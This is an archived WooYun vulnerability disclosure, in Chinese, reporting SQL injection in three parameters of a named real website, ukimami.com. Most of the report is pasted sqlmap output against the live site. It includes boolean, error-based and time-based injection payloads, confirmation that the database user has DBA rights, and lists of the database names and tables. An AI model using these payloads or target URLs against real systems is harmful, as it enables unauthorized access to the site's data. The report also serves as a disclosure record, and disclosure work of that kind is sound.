乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开
十月妈咪旗下的一个网站,同样存在多个参数注入,以及ajax接口文件存在注入,似乎还没有什么人气!~~~
http://www.ukimami.com/classroom-uki.php?page=21&item=15item存在注入http://www.ukimami.com/product.php?m=product_list&category=10category存在注入www.ukimami.com/ajax_product.php?tid=364|10&time=0.7562016532756388tid存在注入
[*] starting at 21:33:33[21:33:33] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: item Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=21&item=15 AND 4670=4670 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: page=21&item=15 AND (SELECT 4333 FROM(SELECT COUNT(*),CONCAT(0x7164756171,(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END)),0x7164667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: page=21&item=15 AND SLEEP(5)---[21:33:33] [INFO] testing MySQL[21:33:33] [WARNING] reflective value(s) found and filtering out[21:33:33] [INFO] confirming MySQL[21:33:33] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.16, PHP 5.6.12back-end DBMS: MySQL >= 5.0.0[21:33:33] [INFO] fetching current user[21:33:34] [INFO] retrieved: oct_crop@%current user: 'oct_crop@%'[21:33:34] [INFO] fetching current database[21:33:34] [INFO] retrieved: youxicurrent database: 'youxi'[21:33:34] [INFO] testing if current user is DBA[21:33:34] [INFO] fetching current usercurrent user is DBA: Truedatabase management system users [7]:[*] ''@'linux'[*] ''@'localhost'[*] 'oct_crop'@'%'[*] 'oct_crop'@'localhost'[*] 'pma'@'localhost'[*] 'root'@'linux'[*] 'root'@'localhost'[21:37:33] [INFO] fetching database names[21:37:33] [INFO] the SQL query used returns 7 entries[21:37:33] [INFO] retrieved: information_schema[21:37:33] [INFO] retrieved: mysql[21:37:33] [INFO] retrieved: octmami[21:37:34] [INFO] retrieved: performance_schema[21:37:34] [INFO] retrieved: phpmyadmin[21:37:34] [INFO] retrieved: test[21:37:34] [INFO] retrieved: youxiavailable databases [7]:[*] information_schema[*] mysql[*] octmami[*] performance_schema[*] phpmyadmin[*] test[*] youxiDatabase: youxi+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| _bak_oc_shop | 408 || oc_shop | 404 || oc_yproduct | 403 || oc_present_exchange | 309 || oc_product | 265 || oc_yshop | 94 || oc_wiki_info | 61 || oc_product_property | 59 || oc_present_gallery | 52 || oc_module | 51 || oc_jobs | 37 || oc_news | 34 || oc_milestone | 21 || oc_wiki_sort | 20 || oc_dee | 17 || oc_present | 17 || oc_bbs | 15 || oc_member | 15 || oc_video | 10 || oc_index_ad | 7 || oc_join_ab | 7 || oc_lost_card | 7 || oc_product_sort | 7 || oc_yproduct_sort | 5 || oc_admin_user | 4 || oc_uindex_ad | 3 || oc_join_table | 2 || oc_sessions | 2 || oc_contact_us | 1 || oc_sessions_data | 1 || oc_yproduct_property | 1 |+---------------------------------+---------+
依旧是断断续续,时而连上时而断线,就不继续了!~~~
如上
过滤修复
未能联系到厂商或者厂商积极拒绝